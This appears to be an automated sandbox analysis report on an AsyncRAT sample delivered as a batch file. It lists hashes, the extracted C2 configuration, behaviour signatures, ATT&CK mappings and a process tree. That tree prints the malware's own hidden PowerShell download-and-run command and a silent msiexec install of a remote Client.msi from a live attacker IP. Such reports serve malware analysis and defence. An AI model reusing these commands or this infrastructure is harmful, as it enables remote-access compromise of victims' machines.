asyncrat | f21b7aec9770dc80d20ac5fd871b6b88b7ba4586c2ae56faf724a23ee64a6193

General

Target

frobf.bat
Size

17KB
MD5

389078feb0d26c841b905168deaecd15
SHA1

e0013a66fad26afbbac701c3fbd6a0d85ddce3c9
SHA256

f21b7aec9770dc80d20ac5fd871b6b88b7ba4586c2ae56faf724a23ee64a6193
SHA512

ce51959c6d29112e575350013be45f87907edb9dc2c6bc3c8dc566e251a350bc361380202c34874aef71085f745dbf4e4ae4a760f457f49ff5e36f238785d238
SSDEEP

192:oZYztAEqvAb5JqjbLoUfSY1PfcLCL6lh2uxHwNy/FDcTjNolW/uw6yfzyKe:oZY5AEqvA5JEoiJ1PfcL1PDwiMVvWKe

Score

10^/10

asyncrat default discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://103.179.189.111/porn.png

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

103.179.189.111:8848

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\MW-c4e64709-b4db-40e5-bed2-9032221b29c3\files\Client.exe	family_asyncrat

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exemsiexec.exe

flow pid process

6 3956 powershell.exe
24 1820 msiexec.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

3956 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

Client.exe

pid process

1900 Client.exe
Loads dropped DLL 1 IoCs

Processes:

MsiExec.exe

pid process

2156 MsiExec.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

ICACLS.EXE

pid process

736 ICACLS.EXE
Use of msiexec (install) with remote resource 1 IoCs

Processes:

msiexec.exe

pid process

2284 msiexec.exe

flow	pid	process
6	3956	powershell.exe
24	1820	msiexec.exe

pid	process
1900	Client.exe

pid	process
2156	MsiExec.exe

pid	process
736	ICACLS.EXE

pid	process
2284	msiexec.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exe

description	ioc	process
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe

Drops file in Windows directory 7 IoCs

Processes:

msiexec.exeEXPAND.EXE

description	ioc	process
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3F4.tmp	msiexec.exe
File opened for modification	C:\Windows\LOGS\DPX\setupact.log	EXPAND.EXE
File opened for modification	C:\Windows\LOGS\DPX\setuperr.log	EXPAND.EXE
File opened for modification	C:\Windows\Installer\MSIFA4E.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exemsiexec.exeClient.exe

pid	process
3956	powershell.exe
3956	powershell.exe
1820	msiexec.exe
1820	msiexec.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe
1900	Client.exe

Suspicious use of AdjustPrivilegeToken 38 IoCs

Processes:

powershell.exemsiexec.exemsiexec.exeClient.exe

description	pid	process
Token: SeDebugPrivilege	3956	powershell.exe
Token: SeShutdownPrivilege	2284	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2284	msiexec.exe
Token: SeSecurityPrivilege	1820	msiexec.exe
Token: SeCreateTokenPrivilege	2284	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2284	msiexec.exe
Token: SeLockMemoryPrivilege	2284	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2284	msiexec.exe
Token: SeMachineAccountPrivilege	2284	msiexec.exe
Token: SeTcbPrivilege	2284	msiexec.exe
Token: SeSecurityPrivilege	2284	msiexec.exe
Token: SeTakeOwnershipPrivilege	2284	msiexec.exe
Token: SeLoadDriverPrivilege	2284	msiexec.exe
Token: SeSystemProfilePrivilege	2284	msiexec.exe
Token: SeSystemtimePrivilege	2284	msiexec.exe
Token: SeProfSingleProcessPrivilege	2284	msiexec.exe
Token: SeIncBasePriorityPrivilege	2284	msiexec.exe
Token: SeCreatePagefilePrivilege	2284	msiexec.exe
Token: SeCreatePermanentPrivilege	2284	msiexec.exe
Token: SeBackupPrivilege	2284	msiexec.exe
Token: SeRestorePrivilege	2284	msiexec.exe
Token: SeShutdownPrivilege	2284	msiexec.exe
Token: SeDebugPrivilege	2284	msiexec.exe
Token: SeAuditPrivilege	2284	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2284	msiexec.exe
Token: SeChangeNotifyPrivilege	2284	msiexec.exe
Token: SeRemoteShutdownPrivilege	2284	msiexec.exe
Token: SeUndockPrivilege	2284	msiexec.exe
Token: SeSyncAgentPrivilege	2284	msiexec.exe
Token: SeEnableDelegationPrivilege	2284	msiexec.exe
Token: SeManageVolumePrivilege	2284	msiexec.exe
Token: SeImpersonatePrivilege	2284	msiexec.exe
Token: SeCreateGlobalPrivilege	2284	msiexec.exe
Token: SeRestorePrivilege	1820	msiexec.exe
Token: SeTakeOwnershipPrivilege	1820	msiexec.exe
Token: SeRestorePrivilege	1820	msiexec.exe
Token: SeTakeOwnershipPrivilege	1820	msiexec.exe
Token: SeDebugPrivilege	1900	Client.exe

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

cmd.exemsiexec.exeMsiExec.exe

description	pid	process	target process
PID 2420 wrote to memory of 1176	2420	cmd.exe	chcp.com
PID 2420 wrote to memory of 1176	2420	cmd.exe	chcp.com
PID 2420 wrote to memory of 4672	2420	cmd.exe	cmd.exe
PID 2420 wrote to memory of 4672	2420	cmd.exe	cmd.exe
PID 2420 wrote to memory of 464	2420	cmd.exe	find.exe
PID 2420 wrote to memory of 464	2420	cmd.exe	find.exe
PID 2420 wrote to memory of 4936	2420	cmd.exe	find.exe
PID 2420 wrote to memory of 4936	2420	cmd.exe	find.exe
PID 2420 wrote to memory of 4564	2420	cmd.exe	findstr.exe
PID 2420 wrote to memory of 4564	2420	cmd.exe	findstr.exe
PID 2420 wrote to memory of 4700	2420	cmd.exe	findstr.exe
PID 2420 wrote to memory of 4700	2420	cmd.exe	findstr.exe
PID 2420 wrote to memory of 2500	2420	cmd.exe	findstr.exe
PID 2420 wrote to memory of 2500	2420	cmd.exe	findstr.exe
PID 2420 wrote to memory of 4452	2420	cmd.exe	findstr.exe
PID 2420 wrote to memory of 4452	2420	cmd.exe	findstr.exe
PID 2420 wrote to memory of 3228	2420	cmd.exe	cmd.exe
PID 2420 wrote to memory of 3228	2420	cmd.exe	cmd.exe
PID 2420 wrote to memory of 3956	2420	cmd.exe	powershell.exe
PID 2420 wrote to memory of 3956	2420	cmd.exe	powershell.exe
PID 2420 wrote to memory of 2284	2420	cmd.exe	msiexec.exe
PID 2420 wrote to memory of 2284	2420	cmd.exe	msiexec.exe
PID 1820 wrote to memory of 2156	1820	msiexec.exe	MsiExec.exe
PID 1820 wrote to memory of 2156	1820	msiexec.exe	MsiExec.exe
PID 1820 wrote to memory of 2156	1820	msiexec.exe	MsiExec.exe
PID 2156 wrote to memory of 736	2156	MsiExec.exe	ICACLS.EXE
PID 2156 wrote to memory of 736	2156	MsiExec.exe	ICACLS.EXE
PID 2156 wrote to memory of 736	2156	MsiExec.exe	ICACLS.EXE
PID 2156 wrote to memory of 5056	2156	MsiExec.exe	EXPAND.EXE
PID 2156 wrote to memory of 5056	2156	MsiExec.exe	EXPAND.EXE
PID 2156 wrote to memory of 5056	2156	MsiExec.exe	EXPAND.EXE
PID 2156 wrote to memory of 1900	2156	MsiExec.exe	Client.exe
PID 2156 wrote to memory of 1900	2156	MsiExec.exe	Client.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frobf.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2420

C:\Windows\system32\chcp.com
chcp.com 437
2⤵
PID:1176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c type tmp
2⤵
PID:4672

C:\Windows\system32\find.exe
find
2⤵
PID:464

C:\Windows\system32\find.exe
find
2⤵
PID:4936

C:\Windows\system32\findstr.exe
findstr /L /I set C:\Users\Admin\AppData\Local\Temp\frobf.bat
2⤵
PID:4564

C:\Windows\system32\findstr.exe
findstr /L /I goto C:\Users\Admin\AppData\Local\Temp\frobf.bat
2⤵
PID:4700

C:\Windows\system32\findstr.exe
findstr /L /I echo C:\Users\Admin\AppData\Local\Temp\frobf.bat
2⤵
PID:2500

C:\Windows\system32\findstr.exe
findstr /L /I pause C:\Users\Admin\AppData\Local\Temp\frobf.bat
2⤵
PID:4452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c type tmp
2⤵
PID:3228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "& {(New-Object System.Net.WebClient).DownloadFile('http://103.179.189.111/porn.png', \"$env:TEMP\al.png\"); start \"$env:TEMP\al.png\"}"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3956

C:\Windows\system32\msiexec.exe
msiexec /quiet /i http://103.179.189.111/Client.msi
2⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:2284

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1820

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding D8446F08BE7561A332BBF6422E679346
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2156

C:\Windows\SysWOW64\ICACLS.EXE
"C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-c4e64709-b4db-40e5-bed2-9032221b29c3\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
3⤵
- Modifies file permissions
PID:736

C:\Windows\SysWOW64\EXPAND.EXE
"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
3⤵
- Drops file in Windows directory
PID:5056

C:\Users\Admin\AppData\Local\Temp\MW-c4e64709-b4db-40e5-bed2-9032221b29c3\files\Client.exe
"C:\Users\Admin\AppData\Local\Temp\MW-c4e64709-b4db-40e5-bed2-9032221b29c3\files\Client.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1900

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3468,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=4204 /prefetch:8
1⤵
PID:4624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

1

T1222

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\MW-c4e64709-b4db-40e5-bed2-9032221b29c3\files.cab
Filesize
47KB

MD5
16ebf2cc73df381da5b897f52a78ee22

SHA1
c2689939e1c957c30ef261f139057a973c618f47

SHA256
b2f5fcf9b63c873170b0cf7680831251dcc38c703e42fb558bed2120bd15e156

SHA512
cfb58afd9b6b6433dedc8e2364013845d8ca023025ac8a8fecd7930493abc80c5f4961ee279ea06d7658adb4e9f2893c9ece0af8b2ae278d1f99713255a3f683

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-c4e64709-b4db-40e5-bed2-9032221b29c3\files\Client.exe
Filesize
47KB

MD5
c69f098974248c79def70daf8b16bb8b

SHA1
793c9cd72b635d731686db373b5136ff63cabc0a

SHA256
93a0782c15f0c0049c85a07d09742805398aa6491b0b5a31d25603dc233c8f7d

SHA512
d4d29f682cd42a3b494563929ae33356a386f2e9383010fdac8e95ce4c3e77100979d9040faeeb419eaecd82cee66a0521f2d50ee140ac7e0d7b25e77e2ae945

Download Submit
C:\Users\Admin\AppData\Local\Temp\MW-c4e64709-b4db-40e5-bed2-9032221b29c3\msiwrapper.ini
Filesize
1KB

MD5
74ccf3d9d55761c104c6848000c67615

SHA1
6b60a8ccb87911ce3dffabb11ad3ed7e53200b73

SHA256
249b4be1330e10d2299d3ce0b6735365abc3ae024ce268dfb708ff2cab770397

SHA512
b179fbd99d36f2a9ff889e88fc6ea78aca97b955bc3502be6ba1b5e85c5ba888149b50f254e5c047f24e3027e52a7cdb2bce0b3a78d939303ab332689a335998

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_55igihae.jwr.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp
Filesize
14B

MD5
ce585c6ba32ac17652d2345118536f9c

SHA1
be0e41b3690c42e4c0cdb53d53fc544fb46b758d

SHA256
589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3

SHA512
d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

Download Submit
C:\Windows\Installer\MSI3F4.tmp
Filesize
208KB

MD5
0c8921bbcc37c6efd34faf44cf3b0cb5

SHA1
dcfa71246157edcd09eecaf9d4c5e360b24b3e49

SHA256
fd622cf73ea951a6de631063aba856487d77745dd1500adca61902b8dde56fe1

SHA512
ed55443e20d40cca90596f0a0542fa5ab83fe0270399adfaafd172987fb813dfd44ec0da0a58c096af3641003f830341fe259ad5bce9823f238ae63b7e11e108

Download Submit
C:\Windows\Installer\MSIFA4E.tmp
Filesize
292KB

MD5
6bd9dac0f28211bda45fb0c569580e65

SHA1
d2b53dbd29537d7844d17f60c3ca263740a7b8db

SHA256
fecd40361bf0eccab0681d13c32136860ebf9b8d5cc96c4eda6a43af32abe079

SHA512
c3f30f6bd2f2b60b65b3da0e96c1738dc859455cccb354b57d97ad8fe200bea71adf32b865903efac2bc2c8d833dd7d23956dfa7cf3dcefaec63ca47f6fd6ab1

Download Submit
memory/1900-90-0x0000000000EE0000-0x0000000000EF2000-memory.dmp

Filesize
72KB

Download
memory/3956-15-0x00007FFF91310000-0x00007FFF91DD1000-memory.dmp

Filesize
10.8MB

Download
memory/3956-16-0x00007FFF91310000-0x00007FFF91DD1000-memory.dmp

Filesize
10.8MB

Download
memory/3956-20-0x00007FFF91310000-0x00007FFF91DD1000-memory.dmp

Filesize
10.8MB

Download
memory/3956-5-0x0000012BF0A10000-0x0000012BF0A32000-memory.dmp

Filesize
136KB

Download
memory/3956-4-0x00007FFF91313000-0x00007FFF91315000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads